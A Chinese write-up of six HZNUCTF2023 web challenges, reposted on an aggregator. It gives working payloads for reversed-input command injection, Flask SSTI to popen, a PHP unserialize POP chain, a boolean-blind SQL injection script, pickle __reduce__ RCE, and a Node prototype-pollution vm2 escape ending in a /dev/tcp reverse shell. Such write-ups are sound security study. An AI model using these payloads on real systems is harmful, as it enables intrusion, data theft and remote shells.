menu
  • 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

HZNUCTF2023 web

武飞扬头像
葫芦娃42
帮助1

目录

<1> guessguessguess

<2> ezflask(无过滤ssti)

<3> ppppop(cookie泄露 反序列化)

<4> ezlogin(bool盲注)

<5> ezpickle(pickle反序列化)

<6> eznode(原型链污染)

<1> guessguessguess

学新通

尝试是否存在sql注入,发现他会对内容进行倒叙  框里有一个hint 我们试着 传入 tnih 看看有什么

学新通 金 "命令执行" 同时参数名为 cmd 应该是命令执行

ls /看一下,没找到flag 

学新通

最后执行 env flag在环境变量里

  1.  
    <?php
  2.  
    $userArr = array("username: admin<br>password: admin","username: docker<br>password: docker", "username: mxx307<br>password: mxxxxxxx3333000777", "username: FLAG_IN_HERE<br>password: 不给你看");
  3.  
     
  4.  
    $cmd = strrev($_POST['cmd']);
  5.  
    if($cmd != 'hint' && $cmd != 'phpinfo'){
  6.  
    echo "your SQL: SELECT * FROM users WHERE id=$cmd";
  7.  
    echo "<br>";
  8.  
    }
  9.  
    if($cmd == "phpinfo") {
  10.  
    eval('phpinfo();');
  11.  
    } else if(preg_match('/127.0.0.1/',$cmd) && !preg_match('/;|&/',$cmd )) {
  12.  
    system('ping '.$cmd);
  13.  
    } else if($cmd == "hint") {
  14.  
    echo '可爱的CTFer哟,你掉的是这个金"命令执行",还是这个银"XSS"还是这个普通的"SQL注入"呢?';
  15.  
    }else if(preg_match('/^\d$/',$cmd, $matches)) {
  16.  
    if($matches[0] <= 4 && $matches[0] >= 1){
  17.  
    echo $userArr[$matches[0] - 1];
  18.  
    } else {
  19.  
    echo "no user";
  20.  
    }
  21.  
    }else {
  22.  
    echo "猜猜猜";
  23.  
    }
学新通

<2> ezflask(无过滤ssti)

结合名称 提示 /?name= 应该是考察SSTI

传入?name=123 看看 

学新通

和guess差不多,依然是倒序 传入 }}7*7{{ 得到回显是49

在线文本反转_字符串反转_实时逆序字符串文本_汇享在线工具箱 

找基类 下面的记得反转

{{"".__class__}} 得到空字符串类 <class 'str'>

学新通

 {{"".__class__.__mro__}}  得到:<class 'tuple'>, <class 'object'>学新通

 {{"".__class__.__mro__[-1]}} 得到 <class 'object'>

学新通

得到基类之后,找到这个基类的子类集合

{{"".__class__.__mro__[-1].__subclasses__()}}

这里使用其第133个类([0]是第一个类 因此第133个是[132] )<class 'os._wrap_close'>

<class 'os._wrap_close'> 这个类有个popen方法可以执行系统命令

学新通

实例化我们找到的类对象

 {{"".__class__.__mro__[-1].__subclasses__()[132].__init__}}

找到这个实例化对象的所有方法

{{"".__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__}} 

调用popen方法,进行rce 在环境变量里得到flag

{{"".__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('env').read()}}

学新通 <3> ppppop(cookie泄露 反序列化)

进去一片空白,在cookie中发现了一串base64编码

Cookie:user=Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MDt9

解码后得到一串序列化格式的字符串:O:4:"User":1:{s:7:"isAdmin";b:0;}

应该是判断是否Admin 这里bool值为0 所以空白 改为1 base64加密后放到cookie里访问试试

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MTt9

得到源码:

学新通

  1.  
    <?php
  2.  
    error_reporting(0);
  3.  
    include('utils.php');
  4.  
     
  5.  
    class A {
  6.  
    public $className;
  7.  
    public $funcName;
  8.  
    public $args;
  9.  
     
  10.  
    public function __destruct() {
  11.  
    $class = new $this->className;
  12.  
    $funcName = $this->funcName;
  13.  
    $class->$funcName($this->args);
  14.  
    }
  15.  
    }
  16.  
     
  17.  
    class B {
  18.  
    public function __call($func, $arg) {
  19.  
    $func($arg[0]);
  20.  
    }
  21.  
    }
  22.  
     
  23.  
    if(checkUser()) {
  24.  
    highlight_file(__FILE__);
  25.  
    $payload = strrev(base64_decode($_POST['payload']));
  26.  
    unserialize($payload);
  27.  
    }
学新通

就一个节点,很短的链子:A::__destruct() => B::__call()

利用点在于 触发 __call() 

__call() 在一个对象的上下文中,如果调用的方法不存在的时候,它将被触发

 poc如下:

  1.  
    <?php
  2.  
    class A {
  3.  
    public $className;
  4.  
    public $funcName;
  5.  
    public $args;
  6.  
    }
  7.  
     
  8.  
    class B {
  9.  
     
  10.  
    }
  11.  
    $a = new A();
  12.  
    $b = new B();
  13.  
    $a->className = $b;
  14.  
    $a->funcName = "system";
  15.  
    $a->args = "env";
  16.  
    echo base64_encode(strrev(serialize($a)));
  17.  
    ?>
  18.  
     
学新通

注:记得带着构造好的cookie

学新通

<4> ezlogin(bool盲注)

题目进去之后 是一个登录框 源码里给出了一部分过滤的关键词

同时,可以知道传入的username参数 是经过base64解码翻转才得到的

  1.  
    $username = strrev(base64_decode($_POST['username']));
  2.  
    $username = preg_replace('/select|union|and|database/', "hznuctf2023", $username);

这样的话,写脚本就麻烦一些了 我们先fuzz一下看看还有没有过滤其他的关键词

 like   or    #   ord   if   left   right  ||  ^  >  < 等都没被过滤

1'/**/or/**/1/**/like/**/1#

学新通

 为真的话 就回显:success!! you are the best web手

假: username or password is invalid

可以以此盲注

preg_replace可以大写绕过,SELECT DATABASE

 poc脚本如下:

  1.  
    import base64
  2.  
    import requests
  3.  
    import time
  4.  
     
  5.  
    s = requests.session()
  6.  
    url = "http://node2.anna.nssctf.cn:28876/"
  7.  
    flag = ''
  8.  
    i=0
  9.  
    while True:
  10.  
    i = i 1
  11.  
    Max = 128
  12.  
    Min = 32
  13.  
    Mid = (Max Min) // 2
  14.  
    while Min < Max:
  15.  
    #payload = "1^(substr(database(),{},1)='{}')^1".format(i,j)
  16.  
    #payload = "1'/**/or/**/(ord(substr(DATABASE(),{},1))/**/>/**/{})#".format(i,Mid)
  17.  
    #payload = "1'/**/or/**/(ord(substr((SELECT/**/GROUP_CONCAT(TABLE_NAME)/**/FROM/**/INFORMATION_SCHEMA.TABLES/**/WHERE/**/TABLE_SCHEMA/**/like/**/'users'),{},1))/**/>/**/{})#".format(i,Mid)
  18.  
    #payload = "1'/**/or/**/(ord(substr((SELECT/**/GROUP_CONCAT(COLUMN_NAME)/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME/**/like/**/'user'),{},1))/**/>/**/{})#".format(i, Mid)
  19.  
    payload = "1'/**/or/**/(ord(substr((SELECT/**/GROUP_CONCAT(Password)/**/FROM/**/user),{},1))/**/>/**/{})#".format(i, Mid)
  20.  
     
  21.  
    payload = base64.b64encode(payload[::-1].encode('utf-8')).decode('utf-8')
  22.  
    data={
  23.  
    'username':payload
  24.  
    }
  25.  
    r = requests.post(url=url,data=data)
  26.  
    if "success" in r.text:
  27.  
    Min = Mid 1
  28.  
    Mid = (Min Max) // 2
  29.  
    else:
  30.  
    Max = Mid
  31.  
    Mid = (Min Max) // 2
  32.  
     
  33.  
    flag = flag chr(Mid)
  34.  
    if Mid == 32:
  35.  
    break
  36.  
    print(flag)
  37.  
    # 速度太快显示不完全
  38.  
    time.sleep(0.5)
学新通

数据库为:users 表名为:user 字段得到:Host,User,Password,Select_priv,Insert_priv等等

<5> ezpickle(pickle反序列化)

  1.  
    import base64
  2.  
    import pickle
  3.  
    from flask import Flask, request
  4.  
     
  5.  
    app = Flask(__name__)
  6.  
     
  7.  
     
  8.  
    @app.route('/')
  9.  
    def index():
  10.  
    with open('app.py', 'r') as f:
  11.  
    return f.read()
  12.  
     
  13.  
     
  14.  
    @app.route('/calc', methods=['GET'])
  15.  
    def getFlag():
  16.  
    payload = request.args.get("payload")
  17.  
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
  18.  
    return "ganbadie!"
  19.  
     
  20.  
     
  21.  
    @app.route('/readFile', methods=['GET'])
  22.  
    def readFile():
  23.  
    filename = request.args.get('filename').replace("flag", "????")
  24.  
    with open(filename, 'r') as f:
  25.  
    return f.read()
  26.  
     
  27.  
     
  28.  
    if __name__ == '__main__':
  29.  
    app.run(host='0.0.0.0')
学新通

可以看到在 /calc路由  可以get传入payload参赛,会被 pickle.loads()  存在pickle反序列化

题目中过滤了os,我们使用字符串拼接绕过.

题目中还有一个读文件的路由,那么我们就将我们想要得知的命令执行的结果通过tee写到a中,然后通过/readFile路由读取命令执行结果

poc如下:

  1.  
    import pickle
  2.  
    import base64
  3.  
     
  4.  
    class A():
  5.  
    def __reduce__(self):
  6.  
    return (eval,("__import__('o' 's').system('env | tee a')",))
  7.  
     
  8.  
    a = A()
  9.  
    b = pickle.dumps(a)
  10.  
    print(base64.b64encode(b))

也可以用 exec来命令执行,import一下base64 对命令编码一下

  1.  
    def __reduce__(self):
  2.  
    cmd = f'import base64; exec(base64.b64decode("{encoded_payload}"));'
  3.  
    return exec, (cmd,)

如果靶机不出网的话还可以用os.popen结合time.sleep盲注(姿势太多了)

<6> eznode(原型链污染)

 进去之后 得到提示:

POST some json shit to /. no source code and try to find source code

一般nodejs网站的源文件是app.js 访问 /app.js 得到源码

  1.  
     
  2.  
    const express = require('express');
  3.  
    const app = express();
  4.  
    const { VM } = require('vm2');
  5.  
     
  6.  
    app.use(express.json());
  7.  
     
  8.  
    const backdoor = function () {
  9.  
    try {
  10.  
    new VM().run({}.shellcode);
  11.  
    } catch (e) {
  12.  
    console.log(e);
  13.  
    }
  14.  
    }
  15.  
     
  16.  
    const isObject = obj => obj && obj.constructor && obj.constructor === Object;
  17.  
    const merge = (a, b) => {
  18.  
    for (var attr in b) {
  19.  
    if (isObject(a[attr]) && isObject(b[attr])) {
  20.  
    merge(a[attr], b[attr]);
  21.  
    } else {
  22.  
    a[attr] = b[attr];
  23.  
    }
  24.  
    }
  25.  
    return a
  26.  
    }
  27.  
    const clone = (a) => {
  28.  
    return merge({}, a);
  29.  
    }
  30.  
     
  31.  
     
  32.  
    app.get('/', function (req, res) {
  33.  
    res.send("POST some json shit to /. no source code and try to find source code");
  34.  
    });
  35.  
     
  36.  
    app.post('/', function (req, res) {
  37.  
    try {
  38.  
    console.log(req.body)
  39.  
    var body = JSON.parse(JSON.stringify(req.body));
  40.  
    var copybody = clone(body)
  41.  
    if (copybody.shit) {
  42.  
    backdoor()
  43.  
    }
  44.  
    res.send("post shit ok")
  45.  
    }catch(e){
  46.  
    res.send("is it shit ?")
  47.  
    console.log(e)
  48.  
    }
  49.  
    })
  50.  
     
  51.  
    app.listen(3000, function () {
  52.  
    console.log('start listening on port 3000');
  53.  
    });
学新通

审计一下

这里存在backdoor方法,其中创建了一个VM环境,将shellcode属性放在其中执行,这里存在vm沙箱逃逸 利用原型链污染 写入shellcode执行

  1.  
    const backdoor = function () {
  2.  
    try {
  3.  
    new VM().run({}.shellcode);
  4.  
    } catch (e) {
  5.  
    console.log(e);
  6.  
    }
  7.  
    }

再看一下,怎么执行这个backdoor() 方法 发现需要满足 copybody.shit 值为true

  1.  
    app.post('/', function (req, res) {
  2.  
    try {
  3.  
    console.log(req.body)
  4.  
    var body = JSON.parse(JSON.stringify(req.body));
  5.  
    var copybody = clone(body)
  6.  
    if (copybody.shit) {
  7.  
    backdoor()
  8.  
    }
  9.  
    res.send("post shit ok")
  10.  
    }catch(e){
  11.  
    res.send("is it shit ?")
  12.  
    console.log(e)
  13.  
    }
  14.  
    })

可以看到 copybody属性执行了一次clone,跟进clone 典型的merge的原型链污染

  1.  
    const isObject = obj => obj && obj.constructor && obj.constructor === Object;
  2.  
    const merge = (a, b) => {
  3.  
    for (var attr in b) {
  4.  
    if (isObject(a[attr]) && isObject(b[attr])) {
  5.  
    merge(a[attr], b[attr]);
  6.  
    } else {
  7.  
    a[attr] = b[attr];
  8.  
    }
  9.  
    }
  10.  
    return a
  11.  
    }
  12.  
    const clone = (a) => {
  13.  
    return merge({}, a);
  14.  
    }

因此我们这里的思路就是需要传入一个json格式的shit属性,其值为1即可,然后通过原型链污染,将shellcode属性赋值为恶意代码,最后的payload如下

{"shit": "1", "__proto__": {"shellcode": "let res = import('./app.js')\n    res.toString.constructor(\"return this\")\n    ().process.mainModule.require(\"child_process\").execSync('bash -c \"bash -i >& /dev/tcp/vps/ip 0>&1\"').toString();"}}

注:请求头需要为Content-Type: application/json

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgaejcj
系列文章
更多 icon
同类精品
更多 icon
继续加载
友情链接: 申请要求:权重≥3,IP≥1000,内容属同类网站; 申请邮件: luke.wu●vfv.cc 友情链接交换群: 友情链接交换群
外链价格: 【首页 30/月 - 300/年】【内页 50/月 - 500/年】【全站 70/月 - 700/年】 购买外链请加QQ群: 站长交流群